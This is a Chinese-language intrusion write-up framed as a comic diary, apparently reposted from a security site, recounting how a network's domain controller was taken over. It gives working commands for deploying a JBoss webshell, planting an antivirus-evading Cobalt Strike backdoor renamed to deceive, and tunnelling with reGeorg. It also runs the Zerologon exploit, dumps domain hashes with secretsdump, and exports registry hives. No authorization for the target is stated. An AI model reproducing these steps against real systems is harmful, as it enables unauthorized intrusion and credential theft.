牛紅紅的日記（平平無奇拿下域控）

注：本文首發地址：https://www.sec-in.com
文章作者為-句芒安全實驗室-成員之一，歡迎微信搜索關注我們。

一、引文

x年x月x日 晴
我是一只牛，家里的老大，我叫牛紅紅，我還有六個兄弟，分別是橙黃綠青藍紫。后來我知道這名字是一個頭上帶著葫蘆的算命的老頭起的，長大后我問他為什么要起這個名字，老頭說當年他爺爺被妖精抓走，于是他便怒氣沖沖的去解救，上去便是一句：“妖精！還我爺爺！”沒想到妖精和顏悅色的問了他一個問題，他一直苦苦思索，始終沒有結果，說著便給我看了一張他珍藏多年的圖片。

他希望我不會重蹈覆轍。我心疼老頭這么大年紀，身體又弱，便問老頭有什么能幫他的嗎，老頭顫顫巍巍的坐到了一塊石頭上，抽了口煙和藹的望著我，

說：我多年來游走各地，最近我得到了一些線索，可能存在答案，你幫我看看吧。
線索：

二、正文

步驟一： 獲取網站權限

我根據老頭給的線索進行了訪問，發現是一個JBOOS控制臺。

一瞬間我的腦海閃過很多想法，于是我用了最簡單的一種方法，老頭，你這線索的利用的工具給我用用唄，經過軟磨硬泡終于從老頭那騙來了java反序列化終極測試工具。發現目標存在命令執行漏洞，存在域控。

但是發現老頭給的工具部分命令執行不完整，沒辦法，看來得先獲取一個webshell。
方法一：利用此工具上傳上傳webshell至網站根目錄。
利用工具自帶文件管理功能，找到文件web目錄

C:\BAG\JBOSS\jboss-4.2.3.GA\server\default\deploy\jmx-console.war

利用上傳功能上傳至指定目錄。

方法二：
利用現成的工具，參數-u后面加目標地址可以直接獲得一個交互式shell

方法三：遠程部署獲取webshell
1.將shell.jsp文件壓縮為zip文件，更改后綴為war文件

2.將shell.war上傳到遠程服務器上，在該目錄下利用python臨時開啟一個http服務

python -m SimpleHTTPServer 8000 #Python 2 python -m http.server 8000 #Python 3

訪問地址，可以看到服務開啟成功

3.訪問目標控制臺http://1.2.3.4/jmx-console
搜索關鍵字jboss.deployment找到flavor=URL,type=DeploymentScanner點進去

之后搜索關鍵字void addURL()，找到遠程部署地址填寫框，如下圖

填寫完成后點擊invoke,若成功會提示部署成功，點擊下圖中的Back to MBean View

可以查看部署的物理路徑

點擊應用更改，會跳轉到部署好后的訪問地址

4.使用冰蝎測試連接

獲取webshell結束。

步驟二： 獲取服務器權限

利用獲取的webshell上線cs的木馬。
1.服務器運行CS服務端

./teamserver IP 密碼

2.本地運行CS客戶端，添加一個監聽器，并生成windows后門
添加監聽器

生成windows后門
attacks->packages->Windows Executable

選擇監聽器

生成完畢后改個名字，增加迷惑性

3.利用冰蝎上傳文件

cmd下運行

查看服務端未上線，dir再次查看，文件消失，猜測目標可能開啟安全防護軟件。
利用CS插件bypassAV快速生成一個后門文件

上傳，執行，上線。

右擊interact獲取beacon

步驟三： 獲取域控主機權限

由于之前已經確定了域控IP,為了更快拿下域控，遂決定嘗試下MS14-068，失敗，目標不存在漏洞。
MS14-068具體利用方法，可以參考鏈接地址:

MS14-068漏洞復現 https://blog.csdn.net/lhh134/article/details/104139081

本機翻了一下沒有發現有價值的線索，接著轉變思路，看能不能從其他機器上獲取有用的東西，利用抓取到的hash嘗試登陸其他機器，失敗。
繼續按照此思路對內網存活機器常見端口進行探測看是否存在ms17010漏洞或者弱口令的主機。
為方便后續測試，搭建一個代理。上傳常見的幾個代理軟件（注意部分服務器可能會限制只允許80、443端口流量通過），發現被殺后決定使用reg，
利用webshell將對應語言的版本上傳到網站根目錄，
本機運行如下命令，開啟代理

$ python reGeorgSocksProxy.py -p 8080 -u http://目標網站/tunnel.jsp

-p #指定監聽本地的端口
-u #指定腳本的連接地址
修改本地的proxychain的配置文件，kali下默認位置為/etc/proxychains.conf

測試下是否可以正常使用，執行命令

proxychain curl ipinfo.io

如下圖可訪問并獲取到了代理地址的IP

利用代理探測下弱口令

大約在這個時間點，有別的事情處理，就把資料簡單整理了一下，權限也放著沒動。
過了N久以后，等我有時間的時候想起這個，剛好在這期間出現了新的域控漏洞，估摸著時間也出來沒多久，對方不會這么快，于是再次嘗試域提權漏洞，根據網上公開的利用方式
第一步，探測目標是否存在漏洞，發現存在漏洞

proxychains python3 zerologon_tester.py XXX013 10.0.19.13

第二步，將目標域控密碼置空

proxychains python3 cve-2020-1472-exploit.py XXX013 10.0.19.13

第三步，利用impacket下的secretsdump.py腳本獲取域控hash

proxychains python3 secretsdump.py xxx.local/XXX013\$@10.0.19.13 -just-dc -no-pass

[外鏈圖片轉存失敗,源站可能有防盜鏈機制,建議將圖片保存下來直接上傳(img-57Cj72Rw-1617345994272)(/img/sin/M00/00/5D/wKg0C2A4ZDaAT82PAAEzvaOtNHw660.jpg)]
第四步，利用impacket下的wmiexec.py腳本獲取一個域控的shell，直接利用powershell將域控上線到cs，到此步驟獲取了域控權限，已經可以登錄任意域內成員主機。另外為避免脫域還需要把原先的hash還原回去。

第五步，利用獲取的shell，提取域控原始hash。
在shell中依次執行以下命令，保存文件-下載文件-刪除文件

reg save HKLM\SYSTEM system.save #利用注冊表導出hash并保存為system.save reg save HKLM\SAM sam.save reg save HKLM\SECURITY security.save get system.save #下載文件system.save到本地 get sam.save get security.save del /f system.save #刪除文 system.save del /f sam.save del /f security.save

提取出原始hash

python3 secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

第六步，根據提權到的原始hash對域控進行還原，避免脫域。

python3 reinstall_original_pw.py XXX013 10.0.19.13 5e80d11de2760cc86ec02b67a544e269

第七步，再嘗試下是否能用空密碼登錄，不能登錄則代表還原成功。
到此，域控獲取結束。

三、尾結

本次的流程:

1.獲取網站權限-2.獲取服務器權限-3.搭建內網代理-4.利用域控漏洞獲取域控權限

最后，通過搜索，我得到了文件《X友有關葫蘆娃爺爺名字的推測.doc》。
抱著忐忑的心情我緩緩的點開了文件:

總結

以上是生活随笔為你收集整理的牛红红的日记（平平无奇拿下域控）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。